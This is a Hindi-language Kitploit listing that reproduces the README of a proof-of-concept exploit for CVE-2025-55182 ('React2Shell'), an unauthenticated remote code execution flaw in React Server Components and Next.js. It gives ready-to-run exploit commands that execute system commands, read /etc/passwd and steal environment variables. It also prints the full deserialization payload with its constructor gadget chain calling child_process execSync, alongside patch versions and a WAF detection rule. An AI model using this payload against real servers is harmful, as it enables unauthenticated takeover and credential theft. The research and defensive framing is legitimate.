Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182 — CVE-2025-55182 (React2Shell) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो फ्लाइट प्रोटोकॉल डिसेरियलाइज़ेशन के माध्यम से रिएक्ट सर्वर कम्पोनेंट्स में बिना प्रमाणीकरण के रिमोट कोड निष्पादन का प्रदर्शन करता है। इसमें असुरक्षित सर्वर सेटअप और डिटेक्शन स्क्रिप्ट शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/greenheadhq/cve-2025-55182
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubgreenheadhq/cve-2025-55182

CVE-2025-55182

CVE-2025-55182 (React2Shell) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो फ्लाइट प्रोटोकॉल डिसेरियलाइज़ेशन के माध्यम से रिएक्ट सर्वर कम्पोनेंट्स में बिना प्रमाणीकरण के रिमोट कोड निष्पादन का प्रदर्शन करता है। इसमें असुरक्षित सर्वर सेटअप और डिटेक्शन स्क्रिप्ट शामिल हैं।

रिपॉजिटरी देखें
1139 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182 (React2Shell) PoC वातावरण

चेतावनी: यह परियोजना केवल सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए उपयोग की जानी चाहिए। बिना अनुमति के दूसरों के सिस्टम पर इसका उपयोग करना अवैध है।

भेद्यता अवलोकन

आइटमविवरण
CVE IDCVE-2025-55182
उपनामReact2Shell
CVSS स्कोर10.0 (Critical - अधिकतम गंभीरता)
भेद्यता प्रकारUnauthenticated Remote Code Execution (RCE)
खोजकर्ताLachlan Davidson
प्रकाशन तिथि3 दिसंबर 2025

प्रभावित संस्करण

React पैकेज

  • react-server-dom-webpack: 19.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel: 19.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack: 19.0, 19.1.0, 19.1.1, 19.2.0

Next.js

  • 15.0.4, 15.1.8, 15.2.5, 15.3.5, 15.4.7, 15.5.6, 16.0.6

परियोजना संरचना

root@kitploit:~
CVE-2025-55182/
├── README.md                    # यह फ़ाइल
├── vulnerable-server/           # भेद्य Next.js सर्वर
│   ├── package.json
│   ├── next.config.js
│   ├── tsconfig.json
│   └── app/
│       ├── layout.tsx
│       ├── page.tsx
│       └── actions.ts           # Server Action
├── exploit/                     # हमला PoC
│   ├── package.json
│   ├── poc.js                   # RCE हमला स्क्रिप्ट
│   └── check-vulnerability.js   # भेद्यता जाँच स्क्रिप्ट
└── React2Shell-CVE-2025-55182-original-poc/  # मूल PoC संदर्भ

त्वरित प्रारंभ

1. भेद्य सर्वर सेटअप और चलाना

root@kitploit:~
# निर्भरताएं स्थापित करें
cd vulnerable-server
npm install

# डेवलपमेंट मोड में सर्वर चलाएं (पोर्ट 3000)
npm run dev

सर्वर http://localhost:3000 पर चलेगा।

2. हमला PoC चलाएं

नए टर्मिनल में:

root@kitploit:~
# निर्भरताएं स्थापित करें
cd exploit
npm install

# भेद्यता जांचें
npm run check

# PoC चलाएं (परीक्षण मोड)
npm run exploit

हमला PoC उपयोग

बुनियादी परीक्षण (console.log)

root@kitploit:~
node poc.js -m test

कैलकुलेटर चलाएं (RCE प्रमाण का सामान्य तरीका)

root@kitploit:~
# macOS
node poc.js -m calc

# Linux
node poc.js -m calc -c linux

# Windows
node poc.js -m calc -c windows

सिस्टम कमांड चलाएं (RCE)

root@kitploit:~
# id कमांड चलाएं
node poc.js -t http://localhost:3000 -m rce -c "id"

# फ़ाइल पढ़ें
node poc.js -t http://localhost:3000 -m rce -c "cat /etc/passwd"

# सिस्टम जानकारी
node poc.js -t http://localhost:3000 -m rce -c "uname -a"

पर्यावरण चर चुराना

root@kitploit:~
node poc.js -t http://localhost:3000 -m env

कस्टम कोड चलाएं

root@kitploit:~
node poc.js -m custom -c "require('fs').readFileSync('/etc/passwd').toString()"

तकनीकी विश्लेषण

भेद्यता का मूल कारण

React Server Components के Flight प्रोटोकॉल में क्लाइंट द्वारा भेजे गए डेटा को डिसीरियलाइज़ करते समय होता है।

root@kitploit:~
requireModule 함수가 클라이언트가 전송한 속성명을 검증 없이 신뢰
→ moduleExports[metadata[NAME]] 실행 시 hasOwnProperty 검사 없음
→ 프로토타입 체인 조작 가능 (Server-Side Prototype Pollution)
→ Function 생성자 획득 → RCE

हमला श्रृंखला

  1. $@x डिसीरियलाइज़ेशन ट्रिगर - Chunk ऑब्जेक्ट संदर्भ प्राप्त करें
  2. Promise चेनिंग का दुरुपयोग - .then विधि वाला thenable ऑब्जेक्ट इंजेक्ट करें
  3. नकली Chunk ऑब्जेक्ट के साथ पार्सर में पुनः प्रवेश - status: resolved_model सेट करें
  4. गैजेट चेन कॉन्फ़िगरेशन - _response, _formData आदि का उपयोग करें
  5. Function कंस्ट्रक्टर प्राप्त करें - $1:constructor:constructor
  6. मनमाना कोड निष्पादन - new Function(악성코드) चलाएं

पेलोड संरचना

root@kitploit:~
{
    '0': '$1',
    '1': {
        'status': 'resolved_model',
        'reason': 0,
        '_response': '$4',
        'value': '{"then":"$3:map","0":{"then":"$B3"},"length":1}',
        'then': '$2:then'
    },
    '2': '$@3',
    '3': [],
    '4': {
        '_prefix': 'process.mainModule.require("child_process").execSync("id")//',
        '_formData': {
            'get': '$3:constructor:constructor'
        },
        '_chunks': '$2:_response:_chunks'
    }
}

पैच करने का तरीका

Next.js अपग्रेड करें

root@kitploit:~
# 15.0.x उपयोगकर्ता
npm install [email protected]

# 15.1.x उपयोगकर्ता
npm install [email protected]

# 15.2.x उपयोगकर्ता
npm install [email protected]

React पैकेज अपग्रेड करें

root@kitploit:~
npm install [email protected]
npm install [email protected]
npm install [email protected]

पता लगाने का तरीका

HTTP अनुरोध विशेषताएं

  • POST अनुरोध
  • Next-Action हेडर मौजूद
  • multipart/form-data प्रारूप
  • बॉडी में $@, resolved_model, constructor जैसे पैटर्न

WAF नियम उदाहरण

root@kitploit:~
# संदिग्ध Flight पेलोड का पता लगाना
SecRule REQUEST_HEADERS:Next-Action "@rx ." \
    "id:1001,phase:2,deny,status:403,\
    chain"
SecRule REQUEST_BODY "@rx constructor.*constructor" \
    "t:lowercase"

संदर्भ सामग्री

  • React आधिकारिक ब्लॉग
  • मूल PoC (Lachlan Davidson)
  • Datadog Security Labs विश्लेषण
  • Wiz विश्लेषण

लाइसेंस

यह परियोजना केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान की गई है। दुर्भावनापूर्ण उद्देश्यों के लिए इसका उपयोग निषिद्ध है।


सावधानी: यदि आप वास्तविक वातावरण में यह भेद्यता पाते हैं तो तुरंत पैच करें। यदि हमले की पुष्टि होती है तो सुरक्षा टीम को रिपोर्ट करें और उल्लंघन जांच करें।

टूल डाउनलोड करें